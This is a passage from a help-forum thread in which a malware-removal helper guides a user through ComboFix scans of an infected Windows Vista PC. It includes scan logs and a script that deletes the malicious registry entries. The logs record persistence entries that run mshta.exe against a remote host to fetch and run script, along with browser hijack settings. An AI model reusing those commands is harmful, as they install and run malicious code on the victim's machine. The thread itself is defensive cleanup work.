    "TkBellExe"="c:\program files\real\realplayer\Update\realsched.exe" [2011-12-01 296056]
    "DivXUpdate"="c:\program files\DivX\DivX Update\DivXUpdate.exe" [2011-07-28 1259376]
    "SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2012-01-17 252296]
    "APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2012-02-21 59240]
    "iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2012-03-27 421736]
    "MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2012-03-26 931200]
    .
    [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
    "Picasa Media Detector"="c:\program files\Picasa2\PicasaMediaDetector.exe" [2007-10-23 443968]
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
    "EnableUIADesktopToggle"= 0 (0x0)
    "EnableLinkedConnections"= 1 (0x1)
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
    "aux1"=wdmaud.drv
    .
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]
    @="Service"
    .
    [HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Metacafe.lnk]
    path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\Metacafe.lnk
    backup=c:\windows\pss\Metacafe.lnk.CommonStartup
    backupExtension=.CommonStartup
    .
    [HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Microsoft Office.lnk]
    path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Office.lnk
    backup=c:\windows\pss\Microsoft Office.lnk.CommonStartup
    backupExtension=.CommonStartup
    .
    [HKLM\~\startupfolder\C:^Users^GAGAN^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OneNote 2007 Screen Clipper and Launcher.lnk]
    path=c:\users\GAGAN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
    backup=c:\windows\pss\OneNote 2007 Screen Clipper and Launcher.lnk.Startup
    backupExtension=.Startup
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP]
    mshta.exe http://mistymodel.info/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP [?]
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP]
    mshta.exe http://mistymodel.info/reg2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP&log=1 [?]
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HWSetup]
    \HWSetup.exe hwSetUP [X]
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\webvsint]
    mshta [X]
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Akamai NetSession Interface]
    2011-12-13 04:20 3305760 ----a-w- c:\users\GAGAN\AppData\Local\Akamai\netsession_win.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\APSDaemon]
    2012-02-21 01:28 59240 ----a-w- c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Camera Assistant Software]
    2007-04-10 23:40 413696 ----a-w- c:\program files\Camera Assistant Software for Toshiba\traybar.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\dldtamon]
    2010-02-10 12:39 16040 ----a-w- c:\program files\Dell V305\dldtamon.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\dldtmon.exe]
    2010-02-10 12:39 672424 ----a-w- c:\program files\Dell V305\dldtmon.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\EPSON WorkForce 30 Series]
    2007-11-26 21:00 188928 ----a-w- c:\windows\System32\spool\drivers\w32x86\3\E_FATIEEA.EXE
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\googletalk]
    2007-01-01 21:22 3739648 ----a-w- c:\users\GAGAN\AppData\Roaming\Google\Google Talk\googletalk.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HSON]
    2006-12-07 23:49 55416 ----a-w- c:\program files\Toshiba\TBS\HSON.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]
    2012-03-27 09:09 421736 ----a-w- c:\program files\iTunes\iTunesHelper.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\KeNotify]
    2006-11-07 00:14 34352 ----a-w- c:\program files\Toshiba\Utilities\KeNotify.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\NBAgent]
    2009-06-18 07:08 1062184 ----a-w- c:\program files\Nero\Nero BackItUp & Burn\Nero BackItUp\NBAgent.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Pando Media Booster]
    2009-02-27 06:22 2785608 ----a-w- c:\program files\Pando Networks\Media Booster\PMB.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
    2011-10-24 19:28 421888 ----a-w- c:\program files\QuickTime\QTTask.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RtHDVCpl]
    2007-06-13 17:11 4489216 ----a-w- c:\windows\RtHDVCpl.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Skytel]
    2007-05-29 00:39 1826816 ----a-w- c:\windows\SkyTel.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SmoothView]
    2007-03-22 18:46 448632 ----a-w- c:\program files\Toshiba\SmoothView\SmoothView.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Speech Recognition]
    2008-01-19 07:33 49664 ----a-w- c:\windows\Speech\Common\sapisvr.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\StartCCC]
    2006-11-10 16:35 90112 ----a-w- c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SVPWUTIL]
    2006-03-23 04:42 438272 ----a-w- c:\program files\Toshiba\Utilities\SVPWUTIL.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SynTPEnh]
    2009-03-20 11:36 1451304 ----a-w- c:\program files\Synaptics\SynTP\SynTPEnh.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TPwrMain]
    2007-03-29 17:39 411192 ----a-w- c:\program files\Toshiba\Power Saver\TPwrMain.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\VeohPlugin]
    2011-06-30 10:11 2648184 ----a-w- c:\program files\Veoh Networks\VeohWebPlayer\veohwebplayer.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Yahoo! Pager]
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeAntiSpyware]
    "DisableMonitoring"=dword:00000001
    .
    R3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-05-05 257696]
    .
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
    LocalServiceAndNoImpersonation REG_MULTI_SZ FontCache
    .
    Contents of the 'Scheduled Tasks' folder
    .
    2012-05-28 c:\windows\Tasks\Adobe Flash Player Updater.job
    - c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-07 06:08]
    .
    2012-05-28 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-822561583-4103383742-3251873995-1000Core.job
    - c:\users\GAGAN\AppData\Local\Google\Update\GoogleUpdate.exe [2008-11-12 22:14]
    .
    2012-05-29 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-822561583-4103383742-3251873995-1000UA.job
    - c:\users\GAGAN\AppData\Local\Google\Update\GoogleUpdate.exe [2008-11-12 22:14]
    .
    2011-01-29 c:\windows\Tasks\User_Feed_Synchronization-{EA4C49AC-05D5-4334-B956-853DDFB08609}.job
    - c:\windows\system32\msfeedssync.exe [2012-04-12 08:09]
    .
    .
    ------- Supplementary Scan -------
    .
    uStart Page = hxxp://search.imesh.com/
    mStart Page = hxxp://home.sweetim.com
    mSearch Bar = hxxp://us.rd.yahoo.com/customize/ie/defaults/sb/msgr8/*http://www.yahoo.com/ext/search/search.html
    uInternet Settings,ProxyOverride = *.local
    LSP: c:\windows\system32\wpclsp.dll
    TCP: DhcpNameServer = 192.168.1.1
    FF - ProfilePath - c:\users\GAGAN\AppData\Roaming\Mozilla\Firefox\Profiles\bav5d5wt.default\
    FF - prefs.js: browser.search.selectedEngine - GoogIe
    FF - prefs.js: browser.startup.homepage - hxxp://www.aol.com/
    FF - prefs.js: keyword.URL - hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3072254&SearchSource=2&q=
    FF - user.js: browser.search.selectedEngine - GoogIe
    FF - user.js: keyword.URL - hxxp://www.theast.com/search/?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&rls=sIjcOCzt&q=
    FF - user.js: yahoo.homepage.dontask - true
    .
    - - - - ORPHANS REMOVED - - - -
    .
    WebBrowser-{EEE6C35B-6118-11DC-9C72-001320C79847} - (no file)
    WebBrowser-{CCC7A320-B3CA-4199-B1A6-9F516DD69829} - (no file)
    MSConfigStartUp-BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA} - c:\program files\Common Files\Nero\Lib\NMBgMonitor.exe
    MSConfigStartUp-CTFMon - c:\windows\system32\CTF\ctfmon.exe
    MSConfigStartUp-fcconf - c:\users\GAGAN\AppData\Local\Temp\dns-hone.dll
    MSConfigStartUp-InCD - c:\program files\Nero\Nero8\InCD\InCD.exe
    MSConfigStartUp-NDSTray - NDSTray.exe
    MSConfigStartUp-NeroFilterCheck - c:\program files\Common Files\Nero\Lib\NeroCheck.exe
    MSConfigStartUp-SecurDisc - c:\program files\Nero\Nero8\InCD\NBHGui.exe
    MSConfigStartUp-SiteAdvisor - c:\program files\SiteAdvisor\6172\SiteAdv.exe
    MSConfigStartUp-Swusukukasega - c:\users\GAGAN\AppData\Local\ocopodatodejex.dll
    MSConfigStartUp-TkBellExe - c:\program files\Common Files\Real\Update_OB\realsched.exe
    MSConfigStartUp-YSearchProtection - c:\program files\Yahoo!\Search Protection\SearchProtection.exe
    AddRemove-Akamai - c:\program files\common files\akamai\uninstall.exe
    AddRemove-WinImage - c:\users\GAGAN\Desktop\winima81\winimage.exe
    .
    .
    .
    **************************************************************************
    .
    catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
    Rootkit scan 2012-05-28 22:49
    Windows 6.0.6002 Service Pack 2 NTFS
    .
    scanning hidden processes ...
    .
    scanning hidden autostart entries ...
    .
    scanning hidden files ...
    .
    scan completed successfully
    hidden files: 0
    .
    **************************************************************************
    .
    --------------------- LOCKED REGISTRY KEYS ---------------------
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aif\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aifc\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aiff\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.au\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.flac\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m3u\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mid\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.midi\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp3\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ogg\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pcm\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pls\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.snd\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.spx\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wav\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wma\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow]
    @Denied: (Read) (RestrictedCode)
    @Denied: (Read) (LocalSystem)
    @Denied: (Read) (S-1-5-21-822561583-4103383742-3251873995-1000)
    @Denied: (Read) (Administrators)
    @SACL=(02 0001)
    @Ace=(0x11) (1) (S-1-16-4096)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Aurigma]
    @SACL=(02 0001)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software]
    @SACL=(02 0001)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Conduit]
    @SACL=(02 0001)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Unity]
    @SACL=(02 0001)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\uTorrentControl]
    @SACL=(02 0001)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo]
    @SACL=(02 0001)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\bookmarks]
    @SACL=(02 0001)
    "lastact"=dword:00003640
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\ButtonHistory]
    @SACL=(02 0001)
    "srch_ebox"=dword:4785b178
    "srch_hlt"=dword:47854ece
    "clkstrm"=dword:4785b2dc
    "boo"=dword:4785b2dc
    "etpg70_21"=dword:47854ece
    "sst"=dword:47854ecf
    "mess"=dword:4785b2dc
    "mess_off"=dword:4785b2dc
    "yma"=dword:47854eda
    "mus"=dword:47854edb
    "wik"=dword:47854edb
    "vis_srch70"=dword:4785abea
    "cacheldr"=dword:4785b2dc
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\URLHistory]
    @SACL=(02 0001)
    "srch"=dword:4785abec
    "vis_srch70"=dword:4785abec
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\simi_zenith05]
    @SACL=(02 0001)
    "LastPoll_200"=dword:00041537
    "resfeed"=dword:00000002
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\SearchHistory]
    @SACL=(02 0001)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\CDDB]
    @Denied: (Full) (RestrictedCode)
    @Denied: (Full) (LocalSystem)
    @Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\ej-technologies]
    @Denied: (Full) (RestrictedCode)
    @Denied: (Full) (LocalSystem)
    @Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
    @Denied: (Full) (Administrators)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\ej-technologies\exe4j]
    "InstallStarted"=dword:00000000
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall\jlGui 3.0]
    @Denied: (Full) (RestrictedCode)
    @Denied: (Full) (LocalSystem)
    @Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
    @Denied: (Full) (Administrators)
    "UninstallString"="c:\\Windows\\system32\\javaws.exe -uninstall -prompt \"http://www.javazoom.com/jlgui/jws/jlgui3.0.jarjnlp\""
    "DisplayName"="jlGui 3.0"
    "DisplayIcon"="c:\\Users\\GAGAN\\AppData\\LocalLow\\Sun\\Java\\Deployment\\cache\\6.0\\57\\573addb9-2492e35c.ico"
    "NoModify"=dword:00000001
    "NoRepair"=dword:00000001
    "Publisher"="Music Player for the Java(tm) Platform"
    "Comments"="jlGui supports MP3, OGG VORBIS, FLAC, SPEEX, WAV, AIFF, AU audio formats. It ..."
    "URLInfoAbout"="http://www.javazoom.net"
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\Microsoft\Windows\CurrentVersion\Webcheck\Store.1]
    @Denied: (Full) (LocalSystem)
    @Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
    @Denied: (Full) (Administrators)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\System\12a9d3cc-cd48-4c6b-a102-8b76a6f66e5a]
    @Denied: (Full) (RestrictedCode)
    @Denied: (Full) (LocalSystem)
    @Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
    @Denied: (Full) (Administrators)
    "bgu0fw0tDZx8jtqEjccbDg==
    "=hex:45,75,92,1a,9f,09,c9,e9,d6,46,18,dd,5c,30,38,
    96
    .
    [HKEY_LOCAL_MACHINE\software\Classes\.hta]
    @Denied: (Full) (Administrators)
    @Denied: (Full) (Owner)
    @Denied: (Full) (LocalSystem)
    @Denied: (Full) (Administrators)
    @Denied: (Full) (Users)
    @SACL=
    "PerceivedType"="text"
    @="htafile"
    "Content Type"="application/hta"
    .
    [HKEY_LOCAL_MACHINE\software\Classes\.hta\PersistentHandler]
    @="{eec97550-47a9-11cf-b952-00aa0051fe20}"
    .
    [HKEY_LOCAL_MACHINE\system\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
    @Denied: (A) (Users)
    @Denied: (A) (Everyone)
    @Allowed: (B 1 2 3 4 5) (S-1-5-20)
    "BlindDial"=dword:00000000
    "MSCurrentCountry"=dword:000000b5
    .
    Completion time: 2012-05-28 22:55:51
    ComboFix-quarantined-files.txt 2012-05-29 02:55
    .
    Pre-Run: 28,398,157,824 bytes free
    Post-Run: 28,481,286,144 bytes free
    .
    - - End Of File - - 81C424733602C9A0DE9C0999B8DD65AF
     
  10. gagraptor

    gagraptor Thread Starter

    Joined:
    May 23, 2012
    Messages:
    31
    torrents not in use
     
  11. gagraptor

    gagraptor Thread Starter

    Joined:
    May 23, 2012
    Messages:
    31
  12. gagraptor

    gagraptor Thread Starter

    Joined:
    May 23, 2012
    Messages:
    31
    i guess its not its back again:(
     
  13. Mark1956

    Mark1956 Malware Specialist

    Joined:
    May 7, 2011
    Messages:
    14,142
    No surprise with that, I was not sure if Combofix would clear the problem but it has given more information to work from, this fix should clear it. There will be a few more things to do once the problem of the popups has gone so please stick with me until I say we are done.

    We are now going to run ComboFix a different way.
    Open Notepad by clicking on [​IMG] and in the Search box type: Notepad.exe and hit Enter.
    Copy and paste everything in the code box below into it.
    -- Note: Make sure Word Wrap is unchecked in Notepad by clicking on Format in the top menu.
    Code:
    Killall::
    Registry::
    [-HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP]
    [-HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP]
    [-HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\webvsint]
    [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP"=-
    "RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP"=-
    Reboot::
    
    • Save the file as CFScript.txt by choosing Save As... in the File Menu, and save it to your Desktop where the ComboFix icon is also located.
    • Close your browser and disconnect from the Internet.
    • Now use your mouse to drag, then drop the CFScript.txt file on top of ComboFix.exe as seen in the image below.
      [​IMG]
    • This will start ComboFix again and launch the script.
    • ComboFix may reboot your system when it finishes. This is normal.
    • A log will be created just as before and saved to C:\ComboFix.txt. Please copy and paste the contents of ComboFix.txt in your next reply.
    • Be sure to re-enable your anti-virus and other security programs after the scan is complete.
     
  14. gagraptor

    gagraptor Thread Starter

    Joined:
    May 23, 2012
    Messages:
    31
    ComboFix 12-05-29.01 - GAGAN 05/29/2012 23:51:22.3.2 - x86
    Microsoft® Windows Vista&#8482; Home Premium 6.0.6002.2.1252.1.1033.18.1917.927 [GMT -4:00]
    Running from: c:\users\GAGAN\Desktop\ComboFix.exe
    Command switches used :: c:\users\GAGAN\Desktop\CFScript.txt
    AV: Microsoft Security Essentials *Disabled/Updated* {9765EA51-0D3C-7DFB-6091-10E4E1F341F6}
    SP: Microsoft Security Essentials *Disabled/Updated* {2C040BB5-2B06-7275-5A21-2B969A740B4B}
    SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    .
    .
    ((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
    .
    .
    c:\windows\system32\drivers\etc\hosts.ics
    .
    .
    ((((((((((((((((((((((((( Files Created from 2012-04-28 to 2012-05-30 )))))))))))))))))))))))))))))))
    .
    .
    2012-05-30 04:03 . 2012-05-30 04:05 -------- d-----w- c:\users\GAGAN\AppData\Local\temp
    2012-05-30 04:03 . 2012-05-30 04:03 -------- d-----w- c:\users\Default\AppData\Local\temp
    2012-05-30 03:44 . 2012-05-30 03:44 29904 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{0D65DCBB-645F-4F85-8BC7-9E0E1CE17186}\MpKsl5ae50f1e.sys
    2012-05-29 18:04 . 2012-05-08 13:40 6737808 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{0D65DCBB-645F-4F85-8BC7-9E0E1CE17186}\mpengine.dll
    2012-05-29 03:00 . 2012-05-08 13:40 6737808 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
    2012-05-22 05:16 . 2012-05-22 05:16 713784 ------w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{F78CEF23-EB95-4DED-8458-48E319614326}\gapaengine.dll
    2012-05-22 05:09 . 2012-05-22 05:10 -------- d-----w- c:\program files\Microsoft Security Client
    2012-05-19 05:43 . 2012-05-19 09:50 -------- d-----w- c:\programdata\vsint
    2012-05-14 22:57 . 2012-03-20 23:28 53120 ----a-w- c:\windows\system32\drivers\partmgr.sys
    2012-05-14 22:57 . 2012-03-30 12:39 914304 ----a-w- c:\windows\system32\drivers\tcpip.sys
    2012-05-14 22:57 . 2012-03-29 13:39 31232 ----a-w- c:\windows\system32\drivers\tcpipreg.sys
    2012-05-14 22:57 . 2012-02-01 15:10 1404928 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\InkObj.dll
    2012-05-14 22:57 . 2012-02-01 15:10 936960 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\journal.dll
    2012-05-14 22:57 . 2012-02-29 13:41 1069056 ----a-w- c:\windows\system32\DWrite.dll
    2012-05-14 22:57 . 2012-03-01 14:46 219648 ----a-w- c:\windows\system32\d3d10_1core.dll
    2012-05-14 22:57 . 2012-02-29 14:08 1172480 ----a-w- c:\windows\system32\d3d10warp.dll
    2012-05-14 22:57 . 2012-03-01 14:46 160768 ----a-w- c:\windows\system32\d3d10_1.dll
    2012-05-14 22:57 . 2012-02-29 13:44 683008 ----a-w- c:\windows\system32\d2d1.dll
    2012-05-14 22:56 . 2012-04-03 08:16 3550080 ----a-w- c:\windows\system32\ntoskrnl.exe
    2012-05-14 22:56 . 2012-04-03 08:16 3602816 ----a-w- c:\windows\system32\ntkrnlpa.exe
    2012-05-09 04:58 . 2012-05-09 04:58 592824 ----a-w- c:\program files\Mozilla Firefox\gkmedias.dll
    2012-05-09 04:58 . 2012-05-09 04:58 44472 ----a-w- c:\program files\Mozilla Firefox\mozglue.dll
    .
    .
    .
    (((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
    .
    2012-05-08 16:40 . 2012-05-19 08:37 6737808 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{3070EC37-30CA-43AE-AC15-BBE0716A8AAD}\mpengine.dll
    2012-05-05 06:08 . 2012-04-07 05:22 419488 ----a-w- c:\windows\system32\FlashPlayerApp.exe
    2012-05-05 06:08 . 2011-06-14 22:11 70304 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
    2012-04-04 19:56 . 2010-02-20 07:40 22344 ----a-w- c:\windows\system32\drivers\mbam.sys
    2012-04-02 13:36 . 2012-05-14 22:56 2044928 ----a-w- c:\windows\system32\win32k.sys
    2012-03-21 00:44 . 2012-03-21 00:44 74112 ----a-w- c:\windows\system32\drivers\NisDrvWFP.sys
    2012-03-21 00:44 . 2012-03-21 00:44 171064 ----a-w- c:\windows\system32\drivers\MpFilter.sys
    2012-05-09 04:58 . 2011-06-08 03:45 97208 ----a-w- c:\program files\mozilla firefox\components\browsercomps.dll
    .
    .
    ((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
    .
    .
    *Note* empty entries & legit default entries are not shown
    REGEDIT4
    .
    [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\URLSearchHooks]
    "{e9df9360-97f8-4690-afe6-996c80790da4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
    .
    [HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
    .
    [HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{e9df9360-97f8-4690-afe6-996c80790da4}]
    2011-05-09 08:49 176936 ----a-w- c:\program files\uTorrentControl\prxtbuTor.dll
    .
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
    "{e9df9360-97f8-4690-afe6-996c80790da4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
    .
    [HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
    .
    [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Webbrowser]
    "{E9DF9360-97F8-4690-AFE6-996C80790DA4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
    .
    [HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
    .
    [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Sidebar"="c:\program files\Windows Sidebar\sidebar.exe" [2009-04-11 1233920]
    .
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "RtHDVCpl"="RtHDVCpl.exe" [2007-06-13 4489216]
    "Apoint"="c:\program files\Apoint2K\Apoint.exe" [2006-09-11 180224]
    "Skytel"="Skytel.exe" [2007-05-29 1826816]
